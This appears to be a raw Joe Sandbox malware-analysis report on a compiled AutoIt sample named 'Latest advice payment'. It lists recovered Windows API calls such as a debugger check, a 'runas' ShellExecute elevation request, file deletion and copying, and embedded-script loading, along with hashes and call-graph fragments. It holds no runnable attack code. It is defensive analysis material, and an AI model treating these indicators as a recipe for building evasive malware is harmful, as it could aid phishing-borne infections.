103391 59edbd 103390->103391 103392 56838d 103390->103392 103393 580db6 Mailbox 59 API calls 103392->103393 103394 568394 103393->103394 103395 5683b5 103394->103395 103422 568634 59 API calls Mailbox 103394->103422 103395->103039 
103395->103044 103399->103077 103400->103077 103401->103065 103402->103023 103403->103084 103404->103034 103405->103084 103406->103084 103407->103035 103408->103045 103409->103046 103410->103046 103411->103049 103412->103052 103413->103077 103414->103077 103415->103077 103416->103077 103417->103084 103418->103067 103420->103084 103421->103388 103422->103395
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00563B68
• IsDebuggerPresent.KERNEL32 ref: 00563B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,006252F8,006252E0,?,?), ref: 00563BEB
  • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
  • Part of subcall function 0057092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00563C14,006252F8,?,?,?), ref: 0057096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00563C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00617770,00000010), ref: 0059D281
• SetCurrentDirectoryW.KERNEL32(?,006252F8,?,?,?), ref: 0059D2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00614260,006252F8,?,?,?), ref: 0059D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0059D346
  • Part of subcall function 00563A46: GetSysColorBrush.USER32(0000000F), ref: 00563A50
  • Part of subcall function 00563A46: LoadCursorW.USER32(00000000,00007F00), ref: 00563A5F
  • Part of subcall function 00563A46: LoadIconW.USER32(00000063), ref: 00563A76
  • Part of subcall function 00563A46: LoadIconW.USER32(000000A4), ref: 00563A88
  • Part of subcall function 00563A46: LoadIconW.USER32(000000A2), ref: 00563A9A
  • Part of subcall function 00563A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00563AC0
  • Part of subcall function 00563A46: RegisterClassExW.USER32(?), ref: 00563B16
  • Part of subcall function 005639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00563A03
  • Part of subcall function 005639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00563A24
  • Part of subcall function 005639D5: ShowWindow.USER32(00000000,?,?), ref: 00563A38
  • Part of subcall function 005639D5: ShowWindow.USER32(00000000,?,?), ref: 00563A41
  • Part of subcall function 0056434A: _memset.LIBCMT ref: 00564370
  • Part of subcall function 0056434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00564415
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%_
                                                            • API String ID: 529118366-1402309776
                                                            • Opcode ID: 5401cee2a52a69d970e6a984000cf238ed06da479bb44158fd4d9b4decd16897
                                                            • Instruction ID: 7af73d91b20edb1a20c05c168358e3ff6ee92d3c16a0ecd48fca17e538ee7eed
                                                            • Opcode Fuzzy Hash: 5401cee2a52a69d970e6a984000cf238ed06da479bb44158fd4d9b4decd16897
                                                            • Instruction Fuzzy Hash: 6351133090994AEADF21EBB4EC49DFD7F7ABF99304F004065F452A71A2DA705B46CB21
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 005649CD
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • GetCurrentProcess.KERNEL32(?,005EFAEC,00000000,00000000,?), ref: 00564A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00564AA1
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00564AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00564AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00564B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00564B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: ccb0f5f06a05bade43ff7905141f5efb442999d2580e3872bb0eba9a9b94cc64
                                                            • Instruction ID: 205caa28aceaced2e21965a3e0009194eb6680f21f714fc98ba6e9e4930c48bf
                                                            • Opcode Fuzzy Hash: ccb0f5f06a05bade43ff7905141f5efb442999d2580e3872bb0eba9a9b94cc64
                                                            • Instruction Fuzzy Hash: 0191D5319897C5DECB31DBA885501AEFFF5BF3A300B444DADD0CB97A02D620A548DB69
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00564D8E,?,?,00000000,00000000), ref: 00564E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00564D8E,?,?,00000000,00000000), ref: 00564EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00564D8E,?,?,00000000,00000000,?,?,?,?,?,?,00564E2F), ref: 0059D937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00564D8E,?,?,00000000,00000000,?,?,?,?,?,?,00564E2F), ref: 0059D94C
                                                            • LockResource.KERNEL32(00564D8E,?,?,00564D8E,?,?,00000000,00000000,?,?,?,?,?,?,00564E2F,00000000), ref: 0059D95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 240a4f7224d2daa70cd4322b0ea9c30a8c38a0111794dfbfa8b887b2c7104b87
                                                            • Instruction ID: e0d1ae648056e45ef1cfc7feeb297ff998b67056627973a14664d04e5e04f8ac
                                                            • Opcode Fuzzy Hash: 240a4f7224d2daa70cd4322b0ea9c30a8c38a0111794dfbfa8b887b2c7104b87
                                                            • Instruction Fuzzy Hash: CF119EB5200341BFD7248BA5EC88F277BBEFBC5B11F104268F5558A250DB62EC049A61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: pbb$%_
                                                            • API String ID: 3964851224-893687122
                                                            • Opcode ID: 5d0a537a79f816b04def638d0e4f03c46fafb42d5fc98b468287e80a037f9e60
                                                            • Instruction ID: fdbfb61f4d71998ed2206089a25c2b7cae4f3b96d6c563eada94019f48e45c56
                                                            • Opcode Fuzzy Hash: 5d0a537a79f816b04def638d0e4f03c46fafb42d5fc98b468287e80a037f9e60
                                                            • Instruction Fuzzy Hash: 0C926770608342CFD720DF24D484B2ABBE5BF85304F14996DE88A9B3A2D775EC45DB92
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0059E398), ref: 005C446A
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 005C447B
                                                            • FindClose.KERNEL32(00000000), ref: 005C448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 3a42d6cf0dccb814f57ec00263c5bf6a343dc173ec0e7f01830ae2dd0c747b53
                                                            • Instruction ID: 4f19bac29aecf90f5a39aab5f736c2eed0af460143b5f57caabc5405cbcaadfe
                                                            • Opcode Fuzzy Hash: 3a42d6cf0dccb814f57ec00263c5bf6a343dc173ec0e7f01830ae2dd0c747b53
                                                            • Instruction Fuzzy Hash: 1FE0D8368105406B46186B78EC8DDED7B5CAE15335F204B19F976C50D0EB745D04AAD5
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00570A5B
                                                            • timeGetTime.WINMM ref: 00570D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00570E53
                                                            • Sleep.KERNEL32(0000000A), ref: 00570E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00570EFA
                                                            • DestroyWindow.USER32 ref: 00570F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00570F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 005A4E83
                                                            • TranslateMessage.USER32(?), ref: 005A5C60
                                                            • DispatchMessageW.USER32(?), ref: 005A5C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005A5C82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbb$pbb$pbb$pbb
                                                            • API String ID: 4212290369-3775333826
                                                            • Opcode ID: 3a858e563bc843714bfec085889d327d31afc00639951b741ba0791c479c2cb6
                                                            • Instruction ID: f12676ba6f9c2681d0378a5a40dc1119dbe946e8dfb5108f4aa595236b6cc5a1
                                                            • Opcode Fuzzy Hash: 3a858e563bc843714bfec085889d327d31afc00639951b741ba0791c479c2cb6
                                                            • Instruction Fuzzy Hash: 23B29E70608742DFD728DB24C888FAEBFE5BF85304F14891DE58A972A1DB70E845DB42
                                                            APIs
                                                              • Part of subcall function 005C8F5F: __time64.LIBCMT ref: 005C8F69
                                                              • Part of subcall function 00564EE5: _fseek.LIBCMT ref: 00564EFD
                                                            • __wsplitpath.LIBCMT ref: 005C9234
                                                              • Part of subcall function 005840FB: __wsplitpath_helper.LIBCMT ref: 0058413B
                                                            • _wcscpy.LIBCMT ref: 005C9247
                                                            • _wcscat.LIBCMT ref: 005C925A
                                                            • __wsplitpath.LIBCMT ref: 005C927F
                                                            • _wcscat.LIBCMT ref: 005C9295
                                                            • _wcscat.LIBCMT ref: 005C92A8
                                                              • Part of subcall function 005C8FA5: _memmove.LIBCMT ref: 005C8FDE
                                                              • Part of subcall function 005C8FA5: _memmove.LIBCMT ref: 005C8FED
                                                            • _wcscmp.LIBCMT ref: 005C91EF
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9824
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005C9452
                                                            • _wcsncpy.LIBCMT ref: 005C94C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 005C94FB
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 005C9511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005C9522
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005C9534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 1309fa8953eae282fa7f1f525df043edadca13541dd165d64fe88b7f721bf43d
                                                            • Instruction ID: 63b1e3084cf3c751a63661cdf9dbd92acc914f0e56557ca39c8dd504d71ea8c2
                                                            • Opcode Fuzzy Hash: 1309fa8953eae282fa7f1f525df043edadca13541dd165d64fe88b7f721bf43d
                                                            • Instruction Fuzzy Hash: 92C12CB1D0021AAEDF11DF95CC89EDEBBB9FF95310F0044AAE609E7151DB309A448F65
                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00563074
                                                            • RegisterClassExW.USER32(00000030), ref: 0056309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 005630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005630DC
                                                            • LoadIconW.USER32(000000A9), ref: 005630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00563101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 8276eeb176f2b0cad9286d8e3b8466a1bdf5ad36e4dc741f9f7476bec2825136
                                                            • Instruction ID: 197b9e7bd924d9bcc396c424430e1fd5851cf34aaa979fabc25856e4f8978599
                                                            • Opcode Fuzzy Hash: 8276eeb176f2b0cad9286d8e3b8466a1bdf5ad36e4dc741f9f7476bec2825136
                                                            • Instruction Fuzzy Hash: 50316871841784AFDB20CFA4E888A99BFF1FB09310F14416EE581AA2A0D7B90585CF50
                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00563074
                                                            • RegisterClassExW.USER32(00000030), ref: 0056309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 005630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005630DC
                                                            • LoadIconW.USER32(000000A9), ref: 005630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00563101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 0341d9c031ebd7c239ddac1a16497a0e62b3b62242b7a00a679d298379ed8bb9
                                                            • Instruction ID: fbcffae4be4b482cb8cd2727b33e6410e119de36d8b04142395bbede84f34e59
                                                            • Opcode Fuzzy Hash: 0341d9c031ebd7c239ddac1a16497a0e62b3b62242b7a00a679d298379ed8bb9
                                                            • Instruction Fuzzy Hash: E52127B1D01758EFDB20DFA4EC88B9DBBF5FB08700F00912AF552AA2A0DBB505459F90
                                                            APIs
                                                              • Part of subcall function 00564706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006252F8,?,005637AE,?), ref: 00564724
                                                              • Part of subcall function 0058050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00567165), ref: 0058052D
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005671A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0059E8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0059E909
                                                            • RegCloseKey.ADVAPI32(?), ref: 0059E947
                                                            • _wcscat.LIBCMT ref: 0059E9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: f0b588594b930024e6608fce85c6f56de19db0fb0caf78e419352234282ec036
                                                            • Instruction ID: aac6dae56d4126952c09d92d17fc2f2ab9e41dad188ab3bbabb0a6885468ede8
                                                            • Opcode Fuzzy Hash: f0b588594b930024e6608fce85c6f56de19db0fb0caf78e419352234282ec036
                                                            • Instruction Fuzzy Hash: B571B07100A302DEC714EF25EC8696BBFE9FF98310F40192EF485971A0EB309A49CB52
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 005636D2
                                                            • KillTimer.USER32(?,00000001), ref: 005636FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0056371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0056372A
                                                            • CreatePopupMenu.USER32 ref: 0056373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0056374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%_
                                                            • API String ID: 129472671-3018355027
                                                            • Opcode ID: a7c7791e8fc4790089da252145ee38f45d56322c4818e497cd963217d2a5c464
                                                            • Instruction ID: 6c3e472e3bfe8c9d63c280a4516cfa3be122ed4d9d1df4f78c267c7c42b2f44a
                                                            • Opcode Fuzzy Hash: a7c7791e8fc4790089da252145ee38f45d56322c4818e497cd963217d2a5c464
                                                            • Instruction Fuzzy Hash: 854104B2200946ABDF345F68EC4DB793EA6FB50300F140525F503972A1DAB49F45A772
                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00563A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00563A5F
                                                            • LoadIconW.USER32(00000063), ref: 00563A76
                                                            • LoadIconW.USER32(000000A4), ref: 00563A88
                                                            • LoadIconW.USER32(000000A2), ref: 00563A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00563AC0
                                                            • RegisterClassExW.USER32(?), ref: 00563B16
                                                              • Part of subcall function 00563041: GetSysColorBrush.USER32(0000000F), ref: 00563074
                                                              • Part of subcall function 00563041: RegisterClassExW.USER32(00000030), ref: 0056309E
                                                              • Part of subcall function 00563041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005630AF
                                                              • Part of subcall function 00563041: InitCommonControlsEx.COMCTL32(?), ref: 005630CC
                                                              • Part of subcall function 00563041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005630DC
                                                              • Part of subcall function 00563041: LoadIconW.USER32(000000A9), ref: 005630F2
                                                              • Part of subcall function 00563041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00563101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 59d8bf4de188e48ee903d0cf2d989fb6b1d31562317e855a70ac67ed3022d7d0
                                                            • Instruction ID: e3caf118b32737510bc2cd9412486b929362ca7b1eb1033e5b6ab4258cb302bc
                                                            • Opcode Fuzzy Hash: 59d8bf4de188e48ee903d0cf2d989fb6b1d31562317e855a70ac67ed3022d7d0
                                                            • Instruction Fuzzy Hash: 48214A70901B04EFEB20DFA4EC49BAD7FB2FB08721F00511AE541AA2E1C7B546459F80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rb
                                                            • API String ID: 1825951767-912277496
                                                            • Opcode ID: 266ff9f04791e5159899b8e7ccbf514aea089b2b56c29325ab6478a2f9965d47
                                                            • Instruction ID: 19a535294db43493cae9dfb69c1d73a9ff8b8d61e80e8aff88dbff9c6e5b1dfb
                                                            • Opcode Fuzzy Hash: 266ff9f04791e5159899b8e7ccbf514aea089b2b56c29325ab6478a2f9965d47
                                                            • Instruction Fuzzy Hash: 5BA14C7290061E9ACF14EBA4DC99AFEBF79BF94310F400529F416B7191EF745A09CBA0
                                                            APIs
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00580193
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0058019B
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005801A6
